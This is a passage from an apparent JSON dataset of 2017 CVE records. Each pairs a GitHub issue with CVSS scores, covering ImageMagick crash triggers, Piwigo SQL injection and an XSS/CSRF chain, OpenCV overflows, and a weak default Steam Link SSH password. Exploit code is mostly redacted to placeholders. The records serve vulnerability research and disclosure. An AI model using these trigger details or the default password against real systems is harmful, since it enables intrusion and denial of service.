fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG 
fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING APITAG APITAG FILETAG Author Credit to Wei You, please contact EMAILTAG for more details.",
  11150. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11151. "severity": "MEDIUM",
  11152. "baseScore": 6.5,
  11153. "impactScore": 3.6,
  11154. "exploitabilityScore": 2.8
  11155. },
  11156. {
  11157. "CVE_ID": "CVE-2017-17760",
  11158. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10351",
  11159. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10351",
  11160. "Repo_new": "opencv/opencv",
  11161. "Issue_Created_At": "2017-12-19T11:26:43Z",
  11162. "description": "Buffer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Detailed description A buffer overflow occurs in function APITAG in file APITAG . The crash details as follows: ERRORTAG Steps to reproduce Please refer to the following url for the testcases: URLTAG url",
  11163. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11164. "severity": "MEDIUM",
  11165. "baseScore": 6.5,
  11166. "impactScore": 3.6,
  11167. "exploitabilityScore": 2.8
  11168. },
  11169. {
  11170. "CVE_ID": "CVE-2017-17774",
  11171. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/822",
  11172. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/822",
  11173. "Repo_new": "piwigo/piwigo",
  11174. "Issue_Created_At": "2017-12-17T16:44:07Z",
  11175. "description": "vulnerability\uff1ause xss+csrf attack to control the admin panel. Well, sir , I just found some vulnerabilities in Piwigo NUMBERTAG I'll show you the details here. First, the admin panel left no csrf protect\uff0cthen we can pishing the admin to vist a webpage in evil site, which contain csrf attack content. Because of some xss vulnerabilities in the admin panel, we can combine xss and csrf successfully. For example, we get a webpage here , which left an stored xss vulnerability. APITAG When the admin user was cheated to visit the evil page url\uff1a APITAG Now the admin user suffered a csrf attack , and writed evil xss content into the site APITAG by himself. The evil poc APITAG will be like this: CODETAG Then we've attacked the admin user by xss successfully, without trying to login by ourself . Altogether\uff0c we should filter the evil character at output points, even in the admin panel . And adding csrf token to important operation in the admin panel is also necessary, because it may cause something more seriously at other points. FILETAG FILETAG Wish your response , sir~",
  11176. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11177. "severity": "HIGH",
  11178. "baseScore": 8.8,
  11179. "impactScore": 5.9,
  11180. "exploitabilityScore": 2.8
  11181. },
  11182. {
  11183. "CVE_ID": "CVE-2017-17792",
  11184. "Issue_Url_old": "https://github.com/BlogoText/blogotext/issues/345",
  11185. "Issue_Url_new": "https://github.com/blogotext/blogotext/issues/345",
  11186. "Repo_new": "blogotext/blogotext",
  11187. "Issue_Created_At": "2017-11-17T02:02:14Z",
  11188. "description": "some vulns found in version NUMBERTAG I have found some vulns in version NUMBERTAG Is there some more private, more security way to contact with you? like a email or so.",
  11189. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  11190. "severity": "MEDIUM",
  11191. "baseScore": 6.1,
  11192. "impactScore": 2.7,
  11193. "exploitabilityScore": 2.8
  11194. },
  11195. {
  11196. "CVE_ID": "CVE-2017-17822",
  11197. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/823",
  11198. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/823",
  11199. "Repo_new": "piwigo/piwigo",
  11200. "Issue_Created_At": "2017-12-18T12:57:57Z",
  11201. "description": "SQL injection in admin/users. By using field APITAG you can inject unexpected content to the database. This security issue is not \"critical\" because it requires access to administration, but should be fixed anyway.",
  11202. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  11203. "severity": "MEDIUM",
  11204. "baseScore": 4.9,
  11205. "impactScore": 3.6,
  11206. "exploitabilityScore": 1.2
  11207. },
  11208. {
  11209. "CVE_ID": "CVE-2017-17823",
  11210. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/826",
  11211. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/826",
  11212. "Repo_new": "piwigo/piwigo",
  11213. "Issue_Created_At": "2017-12-18T16:09:04Z",
  11214. "description": "SQL injection in configuration setting. The configuration setting \"order by\" can receive an SQL injection. This vulnerability is not considered as critical because it requires admin access to be exploited.",
  11215. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  11216. "severity": "MEDIUM",
  11217. "baseScore": 4.9,
  11218. "impactScore": 3.6,
  11219. "exploitabilityScore": 1.2
  11220. },
  11221. {
  11222. "CVE_ID": "CVE-2017-17824",
  11223. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/825",
  11224. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/825",
  11225. "Repo_new": "piwigo/piwigo",
  11226. "Issue_Created_At": "2017-12-18T15:43:58Z",
  11227. "description": "SQL injection on Batch Manager, unit mode. The Batch Manager has a SQL injection vulnerability. The bug is not critical because it requires administration access to be exploited, but needs to be fixed anyway.",
  11228. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  11229. "severity": "MEDIUM",
  11230. "baseScore": 4.9,
  11231. "impactScore": 3.6,
  11232. "exploitabilityScore": 1.2
  11233. },
  11234. {
  11235. "CVE_ID": "CVE-2017-17877",
  11236. "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/119",
  11237. "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/119",
  11238. "Repo_new": "ValveSoftware/steamlink-sdk",
  11239. "Issue_Created_At": "2017-12-23T23:24:22Z",
  11240. "description": "IP NUMBERTAG Firewall Needed. Given that NUMBERTAG silently truncates passwords to NUMBERTAG characters, having SSHD bind to all IP addresses isn't a great idea. This isn't much of a risk with most home networks due to IP NUMBERTAG NAT ( URLTAG but those with IP NUMBERTAG will end up having their Steam Link accessible on the internet if there's no incoming firewall. FILETAG We really do need iptables / ip6tables. ERRORTAG",
  11241. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11242. "severity": "CRITICAL",
  11243. "baseScore": 9.8,
  11244. "impactScore": 5.9,
  11245. "exploitabilityScore": 3.9
  11246. },
  11247. {
  11248. "CVE_ID": "CVE-2017-17878",
  11249. "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/110",
  11250. "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/110",
  11251. "Repo_new": "ValveSoftware/steamlink-sdk",
  11252. "Issue_Created_At": "2017-11-05T15:06:49Z",
  11253. "description": "Only first NUMBERTAG characters of password are checked. Only first NUMBERTAG chars of password are checked for validity when connecting over ssh. Reproduce NUMBERTAG ssh to steamlink NUMBERTAG for defaultpassword 'steamlin' is sufficient NUMBERTAG change password with 'passwd' to a long password over NUMBERTAG chars. (e.g NUMBERTAG log out NUMBERTAG login with first NUMBERTAG characters of new password and any arbitrary characters after that. (e.g NUMBERTAG",
  11254. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11255. "severity": "CRITICAL",
  11256. "baseScore": 9.8,
  11257. "impactScore": 5.9,
  11258. "exploitabilityScore": 3.9
  11259. },
  11260. {
  11261. "CVE_ID": "CVE-2017-17878",
  11262. "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/101",
  11263. "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/101",
  11264. "Repo_new": "ValveSoftware/steamlink-sdk",
  11265. "Issue_Created_At": "2017-08-12T09:05:29Z",
  11266. "description": "Default root password is not steamlink NUMBERTAG The default root password when enabling and connecting to the Steam Link with ssh is not \"steamlink NUMBERTAG it is \"steamlin\". Please change this is in the documentation, or change the password.",
  11267. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11268. "severity": "CRITICAL",
  11269. "baseScore": 9.8,
  11270. "impactScore": 5.9,
  11271. "exploitabilityScore": 3.9
  11272. },
  11273. {
  11274. "CVE_ID": "CVE-2017-17879",
  11275. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/906",
  11276. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/906",
  11277. "Repo_new": "imagemagick/imagemagick",
  11278. "Issue_Created_At": "2017-12-21T07:57:04Z",
  11279. "description": "heap buffer overflow in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert heap buffer overflow APITAG /dev/null ERRORTAG tesecase: URLTAG",
  11280. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11281. "severity": "HIGH",
  11282. "baseScore": 8.8,
  11283. "impactScore": 5.9,
  11284. "exploitabilityScore": 2.8
  11285. },
  11286. {
  11287. "CVE_ID": "CVE-2017-17880",
  11288. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/907",
  11289. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/907",
  11290. "Repo_new": "imagemagick/imagemagick",
  11291. "Issue_Created_At": "2017-12-21T08:52:20Z",
  11292. "description": "stack buffer overflow in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert stack buffer overflow NUMBERTAG dev/null ERRORTAG testcase: URLTAG",
  11293. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11294. "severity": "HIGH",
  11295. "baseScore": 8.8,
  11296. "impactScore": 5.9,
  11297. "exploitabilityScore": 2.8
  11298. },
  11299. {
  11300. "CVE_ID": "CVE-2017-17881",
  11301. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/878",
  11302. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/878",
  11303. "Repo_new": "imagemagick/imagemagick",
  11304. "Issue_Created_At": "2017-11-24T05:58:35Z",
  11305. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
  11306. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11307. "severity": "MEDIUM",
  11308. "baseScore": 6.5,
  11309. "impactScore": 3.6,
  11310. "exploitabilityScore": 2.8
  11311. },
  11312. {
  11313. "CVE_ID": "CVE-2017-17882",
  11314. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/880",
  11315. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/880",
  11316. "Repo_new": "imagemagick/imagemagick",
  11317. "Issue_Created_At": "2017-11-24T06:17:05Z",
  11318. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
  11319. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11320. "severity": "MEDIUM",
  11321. "baseScore": 6.5,
  11322. "impactScore": 3.6,
  11323. "exploitabilityScore": 2.8
  11324. },
  11325. {
  11326. "CVE_ID": "CVE-2017-17883",
  11327. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/877",
  11328. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/877",
  11329. "Repo_new": "imagemagick/imagemagick",
  11330. "Issue_Created_At": "2017-11-24T05:49:54Z",
  11331. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase\uff1a URLTAG",
  11332. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11333. "severity": "MEDIUM",
  11334. "baseScore": 6.5,
  11335. "impactScore": 3.6,
  11336. "exploitabilityScore": 2.8
  11337. },
  11338. {
  11339. "CVE_ID": "CVE-2017-17884",
  11340. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/902",
  11341. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/902",
  11342. "Repo_new": "imagemagick/imagemagick",
  11343. "Issue_Created_At": "2017-12-19T07:22:34Z",
  11344. "description": "memory leaks in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert 'memory leaks APITAG /dev/null ERRORTAG testcase: FILETAG ~",
  11345. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11346. "severity": "MEDIUM",
  11347. "baseScore": 6.5,
  11348. "impactScore": 3.6,
  11349. "exploitabilityScore": 2.8
  11350. },
  11351. {
  11352. "CVE_ID": "CVE-2017-17885",
  11353. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/879",
  11354. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/879",
  11355. "Repo_new": "imagemagick/imagemagick",
  11356. "Issue_Created_At": "2017-11-24T06:05:28Z",
  11357. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
  11358. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11359. "severity": "MEDIUM",
  11360. "baseScore": 6.5,
  11361. "impactScore": 3.6,
  11362. "exploitabilityScore": 2.8
  11363. },
  11364. {
  11365. "CVE_ID": "CVE-2017-17886",
  11366. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/874",
  11367. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/874",
  11368. "Repo_new": "imagemagick/imagemagick",
  11369. "Issue_Created_At": "2017-11-23T01:41:28Z",
  11370. "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
  11371. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11372. "severity": "MEDIUM",
  11373. "baseScore": 6.5,
  11374. "impactScore": 3.6,
  11375. "exploitabilityScore": 2.8
  11376. },
  11377. {
  11378. "CVE_ID": "CVE-2017-17887",
  11379. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/903",
  11380. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/903",
  11381. "Repo_new": "imagemagick/imagemagick",
  11382. "Issue_Created_At": "2017-12-19T07:29:18Z",
  11383. "description": "memory leaks in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert memory leaks APITAG /dev/null ERRORTAG FILETAG",
  11384. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11385. "severity": "MEDIUM",
  11386. "baseScore": 6.5,
  11387. "impactScore": 3.6,
  11388. "exploitabilityScore": 2.8
  11389. },
  11390. {
  11391. "CVE_ID": "CVE-2017-17914",
  11392. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/908",
  11393. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/908",
  11394. "Repo_new": "imagemagick/imagemagick",
  11395. "Issue_Created_At": "2017-12-22T02:21:06Z",
  11396. "description": "CPU and Memory exhaustion. Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG Memory NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following CODETAG Trigger Command: magick convert ./cpu memory exhaustion mng /dev/null Be careful, please monitor the memory percentage, I had to reboot my computer a few minutes ago. Debug When debug we found the program is always in a while loop APITAG ERRORTAG testcase: URLTAG",
  11397. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11398. "severity": "MEDIUM",
  11399. "baseScore": 6.5,
  11400. "impactScore": 3.6,
  11401. "exploitabilityScore": 2.8
  11402. },
  11403. {
  11404. "CVE_ID": "CVE-2017-17934",
  11405. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/920",
  11406. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/920",
  11407. "Repo_new": "imagemagick/imagemagick",
  11408. "Issue_Created_At": "2017-12-26T07:56:41Z",
  11409. "description": "memory leaks in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib magick convert Memory Leak APITAG NUMBERTAG msl ERRORTAG testcase: URLTAG",
  11410. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11411. "severity": "MEDIUM",
  11412. "baseScore": 6.5,
  11413. "impactScore": 3.6,
  11414. "exploitabilityScore": 2.8
  11415. },
  11416. {
  11417. "CVE_ID": "CVE-2017-17971",
  11418. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/8000",
  11419. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/8000",
  11420. "Repo_new": "dolibarr/dolibarr",
  11421. "Issue_Created_At": "2017-12-29T14:19:38Z",
  11422. "description": "XSS by using \"onclick\". Bug FILETAG FILETAG Fix Add the \"onclick\"\u3001\"onscroll\" in the black list, and escape the \"<\",etc.",
  11423. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  11424. "severity": "MEDIUM",
  11425. "baseScore": 6.1,
  11426. "impactScore": 2.7,
  11427. "exploitabilityScore": 2.8
  11428. },
  11429. {
  11430. "CVE_ID": "CVE-2017-18005",
  11431. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/168",
  11432. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/168",
  11433. "Repo_new": "exiv2/exiv2",
  11434. "Issue_Created_At": "2017-11-18T22:24:23Z",
  11435. "description": "NULL Pointer Dereference while extracting metadata of a malformed tiff. There's a NULL Pointer Dereference occurring during the metadata extraction from a malformed tiff file. This can be triggered by running APITAG on the test case, FILETAG . The hexdump of the test case is: CODETAG The relevant ASAN output is: ERRORTAG It looks like the NULL Pointer Dereference is being triggered by a NUMBERTAG alue which is being used in the APITAG function in the value of n , which is being dereferenced in APITAG This is indicated by the GDB backtrace: CODETAG Debug info: Exi NUMBERTAG ersion NUMBERTAG a NUMBERTAG bit build) Compiler: gcc NUMBERTAG clang NUMBERTAG OS: Ubuntu NUMBERTAG",
  11436. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11437. "severity": "MEDIUM",
  11438. "baseScore": 5.5,
  11439. "impactScore": 3.6,
  11440. "exploitabilityScore": 1.8
  11441. },
  11442. {
  11443. "CVE_ID": "CVE-2017-18008",
  11444. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/921",
  11445. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/921",
  11446. "Repo_new": "imagemagick/imagemagick",
  11447. "Issue_Created_At": "2017-12-27T01:42:51Z",
  11448. "description": "memory leaks in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib magick convert Memory Leak APITAG /dev/null ERRORTAG test case: URLTAG",
  11449. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11450. "severity": "MEDIUM",
  11451. "baseScore": 6.5,
  11452. "impactScore": 3.6,
  11453. "exploitabilityScore": 2.8
  11454. },
  11455. {
  11456. "CVE_ID": "CVE-2017-18009",
  11457. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10479",
  11458. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10479",
  11459. "Repo_new": "opencv/opencv",
  11460. "Issue_Created_At": "2018-01-01T03:37:50Z",
  11461. "description": "Buffer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Detailed description Detailed description A buffer overflow occurs in function APITAG in file PATHTAG The crash details as follows: ERRORTAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
  11462. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11463. "severity": "HIGH",
  11464. "baseScore": 7.5,
  11465. "impactScore": 3.6,
  11466. "exploitabilityScore": 3.9
  11467. },
  11468. {
  11469. "CVE_ID": "CVE-2017-18021",
  11470. "Issue_Url_old": "https://github.com/IJHack/QtPass/issues/338",
  11471. "Issue_Url_new": "https://github.com/ijhack/qtpass/issues/338",
  11472. "Repo_new": "ijhack/qtpass",
  11473. "Issue_Created_At": "2017-12-22T16:41:17Z",
  11474. "description": "Insecure Password Generation. The current way of generating passwords is insecure. All passwords that have been generated with APITAG in the past must be regenerated and changed. Here is the current password generation function: CODETAG The problem here is that module will not uniformly distribute that set. The proper way to do things is to just throw away values that are out of bounds. You _could_ try to do the calculation correctly to uniformly stretch or compress, but it's hard to get right, so it's best to just discard numbers outside the set and try again. Secondly, and more critically, here is the implementation of APITAG : CODETAG Unfortunately, using a non cryptographically secure random number generator like libc's APITAG is problematic future outputs can be derived from knowing only a handful of past outputs and seeding that deterministic rng with APITAG is even more dangerous. Not only is the current time a guessable/bruteforcable parameter, but the documentation for APITAG actually indicates that this is merely the \" the millisecond part NUMBERTAG to NUMBERTAG of the time URLTAG \", which means there are only NUMBERTAG possibilities of generated sequences of passwords. This is as bad as it gets, in terms of password manager key generation. The proper fix is to use Qt NUMBERTAG s APITAG URLTAG . If NUMBERTAG is not available to you, use APITAG on APITAG and APITAG on Windows URLTAG .",
  11475. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11476. "severity": "CRITICAL",
  11477. "baseScore": 9.8,
  11478. "impactScore": 5.9,
  11479. "exploitabilityScore": 3.9
  11480. },
  11481. {
  11482. "CVE_ID": "CVE-2017-18022",
  11483. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/904",
  11484. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/904",
  11485. "Repo_new": "imagemagick/imagemagick",
  11486. "Issue_Created_At": "2017-12-20T06:01:03Z",
  11487. "description": "memory leaks. system\uff1aubuntu NUMBERTAG ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage poc /dev/null montage: no decode delegate for this image format ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bc NUMBERTAG b6 in APITAG PATHTAG NUMBERTAG ff9bc7cd1c2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG ff9ba NUMBERTAG df NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG ff9bd NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bd NUMBERTAG fb NUMBERTAG in APITAG PATHTAG NUMBERTAG ff9bc NUMBERTAG b6 in APITAG PATHTAG NUMBERTAG ff9bc7cd1c2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG ff9ba NUMBERTAG df NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
  11488. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11489. "severity": "MEDIUM",
  11490. "baseScore": 6.5,
  11491. "impactScore": 3.6,
  11492. "exploitabilityScore": 2.8
  11493. },
  11494. {
  11495. "CVE_ID": "CVE-2017-18027",
  11496. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/734",
  11497. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/734",
  11498. "Repo_new": "imagemagick/imagemagick",
  11499. "Issue_Created_At": "2017-09-06T14:58:42Z",
  11500. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in coders/mat.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  11501. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11502. "severity": "MEDIUM",
  11503. "baseScore": 6.5,
  11504. "impactScore": 3.6,
  11505. "exploitabilityScore": 2.8
  11506. },
  11507. {
  11508. "CVE_ID": "CVE-2017-18028",
  11509. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/736",
  11510. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/736",
  11511. "Repo_new": "imagemagick/imagemagick",
  11512. "Issue_Created_At": "2017-09-07T06:44:11Z",
  11513. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When convert tiff file , imagemagick will allocate memory to store the data, here is the critical code: (tiff.c , in function APITAG APITAG The \"rows\" can be got from tiff file,that is to say it can be controlled by input APITAG is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG APITAG of Venustech",
